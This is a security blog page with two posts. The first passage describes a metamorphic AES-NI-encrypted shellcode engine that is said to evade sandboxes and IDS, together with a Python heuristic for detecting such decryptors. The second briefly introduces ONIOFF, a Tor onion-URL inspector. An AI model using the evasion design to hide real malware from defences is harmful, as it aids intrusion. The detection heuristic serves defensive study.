malwr with cuckoo2 doesn't see anything suspicious.
From the reverser's perspective, IDA won't see anything either.
Radare2 would show the real instructions only if assembled by the assembler itself; however, it doesn't detect any crypto or suspicious activity in the executable.
Although I didn't test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly...

To put it in a nutshell
Basically, it can transform a script kiddie's code (or a known one) into a zero-day.
IDPS will fail because it's almost impossible to make a signature and difficult to make a regular expression or heuristic analysis.
Most sandboxes don't use Intel's AES-NI instructions directly, so they will not execute the code, so "everything is fine" for them, whereas it's not.
The only way to defeat this type of shellcode/malware is to use appropriate sandboxing and/or an AI.
Notice that the whole execution is done in pure assembly; no Python (or shitty OpenSSL) is needed for the shellcode's/malware's execution since I use built-in assembly instructions only, thus it's system-independent (surely, you will have to assemble it for each one by adapting the instructions/opcodes, but they are still the same).
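The steps in How it works and the claims in the paragraphs above point at one detection opportunity: whatever the metamorphic layer does to constants and logic, a decryptor built on AES-NI must still contain AES-NI opcodes, and the encrypted body it decrypts looks like random data. As an added example (not MorphAES code), the following Python heuristic locates AES-NI instructions in a byte blob, measures byte entropy per window, and flags a blob when a decryption instruction sits next to a high-entropy region. The opcode bytes are Intel's documented legacy encodings; the sample blob, window size, thresholds and proximity distance are constructed assumptions:

```python
# Added example, not MorphAES code: a detection heuristic aimed at the design
# described above. The payload is AES-encrypted (so it looks like random data)
# and decrypted at run time with AES-NI instructions; the metamorphic layer can
# rewrite constants and logic, but a decryptor built on AES-NI still has to
# emit AES-NI opcodes. The heuristic flags a blob that contains AES-NI decrypt
# instructions near a high-entropy region. The opcode encodings are Intel's
# documented legacy (non-VEX) forms; the sample blob is constructed.
import math
import re
from collections import Counter

# 66 [REX] 0F 38 DB..DF : AESIMC, AESENC, AESENCLAST, AESDEC, AESDECLAST
# 66 [REX] 0F 3A DF     : AESKEYGENASSIST
AESNI_RE = re.compile(rb"\x66[\x40-\x4f]?\x0f(?:\x38[\xdb-\xdf]|\x3a\xdf)")
MNEMONIC = {0xdb: "aesimc", 0xdc: "aesenc", 0xdd: "aesenclast", 0xde: "aesdec", 0xdf: "aesdeclast"}


def find_aesni(blob):
    """Return [(offset, mnemonic)] for each AES-NI opcode pattern found in blob."""
    hits = []
    for m in AESNI_RE.finditer(blob):
        raw = m.group(0)
        mnemonic = "aeskeygenassist" if raw[-2] == 0x3a else MNEMONIC[raw[-1]]
        hits.append((m.start(), mnemonic))
    return hits


def shannon_entropy(data):
    """Bits per byte; 8.0 means every value is equally likely, 0.0 means one value only."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(blob, window=256, threshold=7.0):
    """Offsets of non-overlapping windows whose entropy exceeds the threshold.
    Encrypted or compressed data sits well above 7 bits/byte; code and text do not."""
    return [i for i in range(0, len(blob) - window + 1, window)
            if shannon_entropy(blob[i:i + window]) > threshold]


def triage(blob, proximity=512):
    """Suspicious when an AES-NI decryption instruction lies within `proximity`
    bytes of a high-entropy region: the decrypt-then-jump layout."""
    aesni = find_aesni(blob)
    regions = high_entropy_regions(blob)
    decrypt = [(off, mn) for off, mn in aesni if mn in ("aesimc", "aesdec", "aesdeclast")]
    near = any(abs(off - r) <= proximity for off, _ in decrypt for r in regions)
    return {"aesni": aesni, "high_entropy_at": regions, "suspicious": bool(decrypt) and near}


def sample_blob():
    """Constructed: 256 bytes of low-entropy text, a 256-byte stub holding
    aesdec/aesdeclast xmm0, xmm1 padded with NOPs, then a 256-byte block in
    which every byte value occurs exactly once (entropy exactly 8.0)."""
    text = b"ordinary, readable program text; nothing encrypted here. ".ljust(256, b".")
    stub = (b"\x66\x0f\x38\xde\xc1" + b"\x66\x0f\x38\xdf\xc1").ljust(256, b"\x90")
    encrypted_looking = bytes((i * 37 + 11) % 256 for i in range(256))  # a permutation of 0..255
    return text + stub + encrypted_looking


if __name__ == "__main__":
    print(triage(sample_blob()))
```

Treat the verdict as a triage signal rather than a signature: VEX-encoded forms of the same instructions are not matched here, legitimate compressed data also scores high on entropy, and AES-NI appears in benign crypto libraries, so the combination of both indicators in a small, otherwise unremarkable file is what makes a hit worth a closer look.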

Notes
This is still a work in progress, I will implement Windows and BSD/Mac engines and PoCs ASAP.
IDPSes and sandboxes suck.
"Tradition becomes our security, and when the mind is secure it is in decay."
Jiddu Krishnamurti



Onion URL Inspector - ONIOFF



A simple tool - written in pure python - for inspecting Deep Web URLs (or onions).
Compatible with Python 2.6 & 2.7.
Author: Nikolaos Kamarinakis ( nikolaskama.me )


Installation
You can download ONIOFF by cloning the Git Repo and simply installing its requirements:
$ git clone https://github.com/k4m4/onioff.git
$ cd onioff
$ pip install -r requirements.txt

Usage
Usage: python onioff.py {onion} [options]
To view all available options run:
$ python onioff.py -h
NOTE: In order for ONIOFF to work, Tor must be correctly configured and running.

Demo
Here's a short demo:
https://nikolaskama.me/content/images/2016/09/onioff_demo.png
(For more demos click here )


Copyright © Offensive Sec Blog | Powered by OffensiveSec